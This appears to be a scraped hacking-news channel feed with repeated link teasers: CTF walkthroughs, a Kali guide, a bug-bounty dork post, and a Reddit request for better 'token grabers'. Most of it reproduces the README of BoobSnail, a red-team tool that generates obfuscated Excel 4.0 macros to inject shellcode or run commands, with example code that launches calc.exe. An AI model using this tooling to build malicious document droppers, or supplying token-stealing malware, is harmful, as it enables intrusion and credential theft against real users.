Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
ACSC 2021 WEB
https://cdn-images-1.medium.com/max/904/0*yIeYVpQoNOT98jxh.png
write up ข้อ API (web)
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
ACSC 2021 WEB
https://cdn-images-1.medium.com/max/904/0*yIeYVpQoNOT98jxh.png
write up ข้อ API (web)
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
ACSC 2021 WEB
write up ข้อ API (web)
hacking: security in practice
Best token grabers?
I have some shit shady token grabers any recommendations for me to upgrade?
submitted by /u/Jazz_Like_Card_9975
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Best token grabers?
I have some shit shady token grabers any recommendations for me to upgrade?
submitted by /u/Jazz_Like_Card_9975
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Best token grabers?
I have some shit shady token grabers any recommendations for me to upgrade?
hacking: security in practice
Where to submit hacking challenges
I have a hacking challenge with a payout of 0.02 BTC. It's in the form of a Windows x64 game.
I'm having a hard time finding a place to submit it.
Does anyone know where I could submit this challenge?
submitted by /u/cryptocomicon
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Where to submit hacking challenges
I have a hacking challenge with a payout of 0.02 BTC. It's in the form of a Windows x64 game.
I'm having a hard time finding a place to submit it.
Does anyone know where I could submit this challenge?
submitted by /u/cryptocomicon
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Where to submit hacking challenges
I have a hacking challenge with a payout of 0.02 BTC. It's in the form of a Windows x64 game. I'm having a hard time finding a place to submit...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
THEY ARE FOUND US.AREN’T THEY?
https://cdn-images-1.medium.com/max/800/0*AxW3lyXXpX8yTV1Y.jpg
We are excited to get each single information of aliens. We assuming many shapes to them , we are thinking they coming to destroy us. Here…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
THEY ARE FOUND US.AREN’T THEY?
https://cdn-images-1.medium.com/max/800/0*AxW3lyXXpX8yTV1Y.jpg
We are excited to get each single information of aliens. We assuming many shapes to them , we are thinking they coming to destroy us. Here…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
THEY ARE FOUND US.AREN’T THEY?
We are excited to get each single information of aliens. We assuming many shapes to them , we are thinking they coming to destroy us. Here…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to use Kali Linux for beginners | part2
https://cdn-images-1.medium.com/max/1918/1*Vhrh-TqAiJ6XhO_JO8gnzA.png
As we have learnt some basic commands that are mostly used in linux and some important terms related to hacking and networking , now let’s…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to use Kali Linux for beginners | part2
https://cdn-images-1.medium.com/max/1918/1*Vhrh-TqAiJ6XhO_JO8gnzA.png
As we have learnt some basic commands that are mostly used in linux and some important terms related to hacking and networking , now let’s…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to use Kali Linux for beginners | part2
As we have learnt some basic commands that are mostly used in linux and some important terms related to hacking and networking , now let’s…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
BoobSnail : Allows Generating Excel 4.0 XLM Macro
BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features:
* various infection techniques;
* various obfuscation techniques;
* translation of formulas into languages other than English;
* can be used as a library – you can easily write your own generator.
Building and Running
Tested on: Python 3.8.7rc1
pip install -r requirements.txt
python boobsnail.py
. . .._
_ |_ _ |_ / / || | | \ / \ / _ | _ \ _ \ / __ \ | | |
| _\ ( <_| <_) _\ \/ \ | \/ _ | | |_
|_ /__/ ____/|_ / /| ( /|__/
\/ \/ \/ \/ \/
Author: @_mzer0 @stm_cyber
(…)
Generators Usage
python boobsnail.py -h
To display available generators type:
python boobsnail.py
Examples
Generate obfuscated macro that injects x64 or x86 shellcode:
python boobsnail.py Excel4NtDonutGenerator –inputx86 –inputx64 –out boobsnail.csv
Generate obfuscated macro that runs calc.exe:
python boobsnail.py Excel4ExecGenerator –cmd “powershell.exe -c calc.exe” –out boobsnail.csv
Saving output in Excel
* Dump output to CSV file.
* Copy content of CSV file.
* Run Excel and create a new worksheet.
* Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro).
* Paste the content in cell A1 or R1C1.
* Click Data -> Text to Columns.
* Click Next -> Set Semicolon as separator and click Finish. Library Usage
BoobSnail shares the excel4lib library that allows creating your own Excel4 macro generator. excel4lib contains few classes that could be used during writing generator:
* excel4lib.macro.Excel4Macro – allows to defining Excel4 formulas, values variables;
* excel4lib.macro.obfuscator.Excel4Obfuscator – allows to obfuscate created instructions in Excel4Macro;
* excel4lib.lang.Excel4Translator – allows translating formulas to another language.
The main idea of this library is to represent Excel4 formulas, variables, formulas arguments, and values as python objects. Thanks to that you are able to change instructions attributes such as formulas or variables names, values, addresses, etc. in an easy way. For example, let’s create a simple macro that runs calc.exe
from excel4lib.macro import *
#Create macro object
macro = Excel4Macro(“test.csv”)
#Add variable called cmd with value “calc.exe” to the worksheet
cmd = macro.variable(“cmd”, “calc.exe”)
#Add EXEC formula with argument cmd
macro.formula(“EXEC”, cmd)
#Dump to CSV
print(macro.to_csv())
Result:
cmd=”calc.exe”;
=EXEC(cmd);
Now let’s say that you want to obfuscate your macro. To do this you just need to import obfuscator and pass it to the Excel4Macro object:
from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
#Create macro object
macro = Excel4Macro(“test.csv”, obfuscator=Excel4Obfuscator())
#Add variable called cmd with value “calc.exe” to the worksheet
cmd = macro.variable(“cmd”, “calc.exe”)
#Add EXEC formula with argument cmd
macro.formula(“EXEC”, cmd)
#Dump to CSV
print(macro.to_csv())
For now excel4lib shares two obfuscation classes:
* excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc to obfuscate your macro;
* excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption to obfusacte formulas.
As you can see you can write your own obfuscator class and use it in Excel4Macro.
Sometimes you will need to translate your macro to another language for example your native language, in my case it’s Polish. With excel4lib it’s pretty easy. You just need to import Excel4Translator class and call set_language.
from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
#Change language
Excel4Translator.set_language(“pl_PL”)
#Create macro object
macro = Excel4Macro(“test.csv”, obfuscator=Excel4Obfuscator()[...]
___________________________
@hacking_Attack
@Hacking_Video
BoobSnail : Allows Generating Excel 4.0 XLM Macro
BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features:
* various infection techniques;
* various obfuscation techniques;
* translation of formulas into languages other than English;
* can be used as a library – you can easily write your own generator.
Building and Running
Tested on: Python 3.8.7rc1
pip install -r requirements.txt
python boobsnail.py
. . .._
_ |_ _ |_ / / || | | \ / \ / _ | _ \ _ \ / __ \ | | |
| _\ ( <_| <_) _\ \/ \ | \/ _ | | |_
|_ /__/ ____/|_ / /| ( /|__/
\/ \/ \/ \/ \/
Author: @_mzer0 @stm_cyber
(…)
Generators Usage
python boobsnail.py -h
To display available generators type:
python boobsnail.py
Examples
Generate obfuscated macro that injects x64 or x86 shellcode:
python boobsnail.py Excel4NtDonutGenerator –inputx86 –inputx64 –out boobsnail.csv
Generate obfuscated macro that runs calc.exe:
python boobsnail.py Excel4ExecGenerator –cmd “powershell.exe -c calc.exe” –out boobsnail.csv
Saving output in Excel
* Dump output to CSV file.
* Copy content of CSV file.
* Run Excel and create a new worksheet.
* Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro).
* Paste the content in cell A1 or R1C1.
* Click Data -> Text to Columns.
* Click Next -> Set Semicolon as separator and click Finish. Library Usage
BoobSnail shares the excel4lib library that allows creating your own Excel4 macro generator. excel4lib contains few classes that could be used during writing generator:
* excel4lib.macro.Excel4Macro – allows to defining Excel4 formulas, values variables;
* excel4lib.macro.obfuscator.Excel4Obfuscator – allows to obfuscate created instructions in Excel4Macro;
* excel4lib.lang.Excel4Translator – allows translating formulas to another language.
The main idea of this library is to represent Excel4 formulas, variables, formulas arguments, and values as python objects. Thanks to that you are able to change instructions attributes such as formulas or variables names, values, addresses, etc. in an easy way. For example, let’s create a simple macro that runs calc.exe
from excel4lib.macro import *
#Create macro object
macro = Excel4Macro(“test.csv”)
#Add variable called cmd with value “calc.exe” to the worksheet
cmd = macro.variable(“cmd”, “calc.exe”)
#Add EXEC formula with argument cmd
macro.formula(“EXEC”, cmd)
#Dump to CSV
print(macro.to_csv())
Result:
cmd=”calc.exe”;
=EXEC(cmd);
Now let’s say that you want to obfuscate your macro. To do this you just need to import obfuscator and pass it to the Excel4Macro object:
from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
#Create macro object
macro = Excel4Macro(“test.csv”, obfuscator=Excel4Obfuscator())
#Add variable called cmd with value “calc.exe” to the worksheet
cmd = macro.variable(“cmd”, “calc.exe”)
#Add EXEC formula with argument cmd
macro.formula(“EXEC”, cmd)
#Dump to CSV
print(macro.to_csv())
For now excel4lib shares two obfuscation classes:
* excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc to obfuscate your macro;
* excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption to obfusacte formulas.
As you can see you can write your own obfuscator class and use it in Excel4Macro.
Sometimes you will need to translate your macro to another language for example your native language, in my case it’s Polish. With excel4lib it’s pretty easy. You just need to import Excel4Translator class and call set_language.
from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
#Change language
Excel4Translator.set_language(“pl_PL”)
#Create macro object
macro = Excel4Macro(“test.csv”, obfuscator=Excel4Obfuscator()[...]
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
BoobSnail : Allows Generating Excel 4.0 XLM Macro
BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux Tutorials BoobSnail : Allows Generating Excel 4.0 XLM Macro BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features: * various infection techniques; * various obfuscation…
)
#Add variable called cmd with value “calc.exe” to the worksheet
cmd = macro.variable(“cmd”, “calc.exe”)
#Add EXEC formula with argument cmd
macro.formula(“EXEC”, cmd)
#Dump to CSV
print(macro.to_csv())
Result:
cmd=”calc.exe”;
=URUCHOM.PROGRAM(cmd);
For now, only the English and Polish language is supported. If you want to use another language you need to add translations in the excel4lib/lang/langs directory.
For sure, you will need to create a formula that takes another formula as an argument. You can do this by using Excel4Macro.argument function.
from excel4lib.macro import *
macro = Excel4Macro(“test.csv”)
#Add variable called cmd with value “calc” to the worksheet
cmd_1 = macro.variable(“cmd”, “calc”)
#Add cell containing .exe as value
cmd_2 = macro.value(“.exe”)
#Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument(“CONCATENATE”, cmd_1, cmd_2)
#Pass CONCATENATE call as argument to EXEC formula
macro.formula(“EXEC”, exec_arg)
#Dump to CSV
print(macro.to_csv())
Result:
cmd=”calc”;
.exe;
=EXEC(CONCATENATE(cmd,R2C1));
As you can see “.exe” string was passed to CONCATENATE formula as R2C1. R2C1 is address of “.exe” value (ROW number 2 and COLUMN number 1). excel4lib returns references to formulas, values as addresses. References to variables are returned as their names. You probably noted that Excel4Macro class adds formulas, variables, values to the worksheet automaticly in order in which these objects are created and that the start address is R1C1. What if you want to place formulas in another column or row? You can do this by calling Excel4Macro.set_cords function.
from excel4lib.macro import *
macro = Excel4Macro(“test.csv”)
#Column 1
#Add variable called cmd with value “calc” to the worksheet
cmd_1 = macro.variable(“cmd”, “calc”)
#Add cell containing .exe as value
cmd_2 = macro.value(“.exe”)
#Column 2
#Change cords to columns 2
macro.set_cords(2,1)
exec_arg = macro.argument(“CONCATENATE”, cmd_1, cmd_2)
#Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula(“EXEC”, exec_arg)
#Column 1
#Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
#GOTO EXEC call
macro.goto(exec_call)
#Dump to CSV
print(macro.to_csv())
Result:
cmd=”calc”;=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);; Download
___________________________
@hacking_Attack
@Hacking_Video
#Add variable called cmd with value “calc.exe” to the worksheet
cmd = macro.variable(“cmd”, “calc.exe”)
#Add EXEC formula with argument cmd
macro.formula(“EXEC”, cmd)
#Dump to CSV
print(macro.to_csv())
Result:
cmd=”calc.exe”;
=URUCHOM.PROGRAM(cmd);
For now, only the English and Polish language is supported. If you want to use another language you need to add translations in the excel4lib/lang/langs directory.
For sure, you will need to create a formula that takes another formula as an argument. You can do this by using Excel4Macro.argument function.
from excel4lib.macro import *
macro = Excel4Macro(“test.csv”)
#Add variable called cmd with value “calc” to the worksheet
cmd_1 = macro.variable(“cmd”, “calc”)
#Add cell containing .exe as value
cmd_2 = macro.value(“.exe”)
#Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument(“CONCATENATE”, cmd_1, cmd_2)
#Pass CONCATENATE call as argument to EXEC formula
macro.formula(“EXEC”, exec_arg)
#Dump to CSV
print(macro.to_csv())
Result:
cmd=”calc”;
.exe;
=EXEC(CONCATENATE(cmd,R2C1));
As you can see “.exe” string was passed to CONCATENATE formula as R2C1. R2C1 is address of “.exe” value (ROW number 2 and COLUMN number 1). excel4lib returns references to formulas, values as addresses. References to variables are returned as their names. You probably noted that Excel4Macro class adds formulas, variables, values to the worksheet automaticly in order in which these objects are created and that the start address is R1C1. What if you want to place formulas in another column or row? You can do this by calling Excel4Macro.set_cords function.
from excel4lib.macro import *
macro = Excel4Macro(“test.csv”)
#Column 1
#Add variable called cmd with value “calc” to the worksheet
cmd_1 = macro.variable(“cmd”, “calc”)
#Add cell containing .exe as value
cmd_2 = macro.value(“.exe”)
#Column 2
#Change cords to columns 2
macro.set_cords(2,1)
exec_arg = macro.argument(“CONCATENATE”, cmd_1, cmd_2)
#Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula(“EXEC”, exec_arg)
#Column 1
#Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
#GOTO EXEC call
macro.goto(exec_call)
#Dump to CSV
print(macro.to_csv())
Result:
cmd=”calc”;=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);; Download
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
pWnOS v1.1 Walkthrough
I just published pWnOS v1.1
https://medium.com/@sarangiprateek80/pwnos-v1-1-b526345d7c92
submitted by /u/psarangi112
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
pWnOS v1.1 Walkthrough
I just published pWnOS v1.1
https://medium.com/@sarangiprateek80/pwnos-v1-1-b526345d7c92
submitted by /u/psarangi112
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
pWnOS v1.1 Walkthrough
I just published pWnOS v1.1...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What are the most exploited vulnerabilities in LINUX by hackers?
https://cdn-images-1.medium.com/max/1280/1*g4_jjKZ5VtJ-sj1k7VwoSA.png
LINUX KERNEL?
Continue reading on rootissh »
___________________________
@hacking_Attack
@Hacking_Video
What are the most exploited vulnerabilities in LINUX by hackers?
https://cdn-images-1.medium.com/max/1280/1*g4_jjKZ5VtJ-sj1k7VwoSA.png
LINUX KERNEL?
Continue reading on rootissh »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What are the most exploited vulnerabilities in LINUX by hackers?
LINUX KERNEL?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Cyber laws in India and the CIA triad
https://cdn-images-1.medium.com/max/1200/0*lHSbWj3OPMPDgQeC.png
In the late 90s, when we came out of the era of landlines, the internet evolved as the medium of transferring information.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Cyber laws in India and the CIA triad
https://cdn-images-1.medium.com/max/1200/0*lHSbWj3OPMPDgQeC.png
In the late 90s, when we came out of the era of landlines, the internet evolved as the medium of transferring information.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cyber laws in India and the CIA triad
In the late 90s, when we came out of the era of landlines, the internet evolved as the medium of transferring information. Our country went…
5min 400$ using Google Dork
https://medium.com/@fcwdbrqmr/5min-400-using-google-dork-1df6bbe0f9fc?source=rss------bug_bounty-5
https://medium.com/@fcwdbrqmr/5min-400-using-google-dork-1df6bbe0f9fc?source=rss------bug_bounty-5
Hey hunters! This writeup is my first writeup I’ll share with you how I get 400$ in 5min using google dorks. So, Let’s get start. This my…Continue reading on Medium » (https://medium.com/@fcwdbrqmr/5min-400-using-google-dork-1df6bbe0f9fc?source=rss------bug_bounty-5)